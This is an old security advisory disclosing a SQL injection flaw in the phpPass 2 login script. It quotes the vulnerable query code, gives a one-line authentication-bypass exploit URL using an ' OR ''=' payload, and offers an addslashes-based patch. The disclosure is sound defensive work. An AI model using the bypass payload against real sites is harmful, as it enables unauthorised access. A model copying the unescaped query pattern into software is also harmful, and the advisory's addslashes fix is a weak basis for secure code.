20th Jan 2003 [SBWID-5937]
COMMAND
phpPass sql injection
SYSTEMS AFFECTED
phpPass 2
PROBLEM
Frog Man [[email protected]] found :
http://www.frog-man.org/tutos/phpPass.txt
PHP Code/Location :
°°°°°°°°°°°°°°°°°°?
accesscontrol.php :
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
session_unregister("uid");
session_unregister("pwd");
?>
<html>
<head>
<title> Access Denied </title>
[...]
exit;
[...]
------------------------------------------------
Exploit : °°°°°°°°?
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
SOLUTION
A patch can be found on http://www.phpsecure.org
Patch :
°°°°°°?
In accesscontrol.php, replace the lines :
-------------------------------------------------
$sql = "SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------
by :
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------